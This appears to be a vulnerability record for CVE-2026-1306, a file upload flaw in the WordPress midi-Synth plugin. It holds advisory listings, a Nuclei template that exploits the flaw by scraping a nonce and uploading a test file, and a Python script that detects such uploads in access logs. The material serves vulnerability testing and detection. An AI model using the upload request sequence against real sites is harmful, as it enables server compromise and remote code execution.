| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2026-1306 | 28 Apr 2026 16:27 | – | githubexploit |
| CVE-2026-1306 | 14 Feb 2026 06:42 | – | attackerkb |
| CVE-2026-1306 | 14 Feb 2026 07:30 | – | circl |
| WordPress plugin midi-Synth code issue vulnerability | 14 Feb 2026 00:00 | – | cnnvd |
| CVE-2026-1306 | 14 Feb 2026 06:42 | – | cve |
| CVE-2026-1306 midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload via 'export' AJAX Action | 14 Feb 2026 06:42 | – | cvelist |
| CVE-2026-1306 | 14 Feb 2026 07:16 | – | nvd |
| WordPress midi-Synth plugin <= 1.1.0 - Unauthenticated Arbitrary File Upload via 'export' AJAX Action vulnerability | 15 Feb 2026 22:12 | – | patchstack |
| PT-2026-8073 | 14 Feb 2026 00:00 | – | ptsecurity |
| CVE-2026-1306 | 15 Feb 2026 07:10 | – | redhatcve |
```yaml
id: CVE-2026-1306

info:
  name: WordPress midi-Synth <= 1.1.0 - Unauthenticated Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress midi-Synth plugin <= 1.1.0 contains an unrestricted file upload vulnerability caused by missing file type and extension validation in the 'export' AJAX action, letting unauthenticated attackers upload arbitrary files and potentially execute remote code. Exploitation requires the attacker to obtain a valid nonce, which is exposed in frontend JavaScript.
  impact: |
    Unauthenticated attackers can upload arbitrary files and potentially execute remote code on the server.
  remediation: |
    Update to the latest version of the midi-Synth plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/midi-synth/midi-synth-110-unauthenticated-arbitrary-file-upload-via-export-ajax-action
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-1306
    epss-score: 0.04458
    epss-percentile: 0.90218
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: wordpress
    product: midi-synth
    framework: wordpress
  tags: cve,cve2026,wordpress,wp-plugin,midi-synth,file-upload,rce,intrusive

variables:
  randstr: "{{rand_base_string(8)}}"

http:
  - raw:
      # Request 1: fetch the front page, where the plugin's nonce is exposed in JavaScript.
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      # Request 2: call the 'export' AJAX action with a non-MIDI file name (blank line separates headers from body).
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/

        action=export&nonce={{nonce}}&fileName={{randstr}}.txt&fileMidi={{base64("{{randstr}}")}}

      # Request 3: confirm the file was written to the plugin's sound/ directory.
      - |
        GET /wp-content/plugins/midi-synth/sound/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        internal: true
        regex:
          - 'var midiSynth_nonce = "([a-z0-9]+)"'
        group: 1

    matchers:
      - type: dsl
        dsl:
          - status_code_3 == 200
          - contains(body_3, "{{randstr}}")
        condition: and
# digest: 4a0a0047304502205351e041a04d863fd8c627ade78923fe2e8bfbca2c0e07ff37cad97fc74ed8e60221008bb2156c4cfb859757266cf84a59d9358f0e8cf3d1263e8432511c11e2046e04:922c64590222798bb761d5b6d8e72950
```
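The template above confirms the flaw by uploading a `.txt` file and fetching it back from the plugin's `sound/` directory. The following is an added example, not part of the Vulners record or the Nuclei template, that turns the same fingerprint into a detection: it scans web-server access log lines in combined format for fetches of non-MIDI files under that directory and correlates each one with a preceding POST to `admin-ajax.php` from the same client. The sample log lines, the 60-second window and the `.mid`/`.midi` allow-list are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Combined log format (Apache/nginx default). Bodies are not logged, so the
# admin-ajax POST is matched by path only, not by the action=export parameter.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SOUND_DIR = "/wp-content/plugins/midi-synth/sound/"  # where the plugin writes exports
AJAX_PATH = "/wp-admin/admin-ajax.php"
ALLOWED_EXT = {"mid", "midi"}    # assumption: only MIDI exports belong here
WINDOW = timedelta(seconds=60)   # assumption: POST followed by GET within a minute

# Constructed sample: the PoC flow from 203.0.113.5, a legitimate .mid fetch,
# and a stray .php fetch with no correlated POST (possible earlier upload).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Feb/2026:10:00:01 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.5 - - [14/Feb/2026:10:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 17',
    '203.0.113.5 - - [14/Feb/2026:10:00:03 +0000] "GET /wp-content/plugins/midi-synth/sound/x7k2p9qa.txt HTTP/1.1" 200 8',
    '198.51.100.7 - - [14/Feb/2026:11:30:00 +0000] "GET /wp-content/plugins/midi-synth/sound/song.mid HTTP/1.1" 200 4096',
    '198.51.100.9 - - [14/Feb/2026:12:00:00 +0000] "GET /wp-content/plugins/midi-synth/sound/notes.php HTTP/1.1" 200 64',
]

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["path"] = e["path"].split("?", 1)[0]  # ignore query strings
    return e

def find_suspicious_fetches(lines):
    """Return (ip, path, status, correlated) for each non-MIDI file fetched from sound/;
    correlated is True when the same client POSTed to admin-ajax.php within WINDOW before."""
    events = [e for e in map(parse, lines) if e]
    posts = [(e["ip"], e["ts"]) for e in events
             if e["method"] == "POST" and e["path"] == AJAX_PATH]
    hits = []
    for e in events:
        name = e["path"][len(SOUND_DIR):] if e["path"].startswith(SOUND_DIR) else ""
        if not name or "/" in name:
            continue  # not a file directly under sound/
        ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
        if ext in ALLOWED_EXT:
            continue
        correlated = any(ip == e["ip"] and timedelta(0) <= e["ts"] - ts <= WINDOW
                         for ip, ts in posts)
        hits.append((e["ip"], e["path"], e["status"], correlated))
    return hits
```

A hit with `correlated` False still deserves a look, since the file may have been written before the log window began.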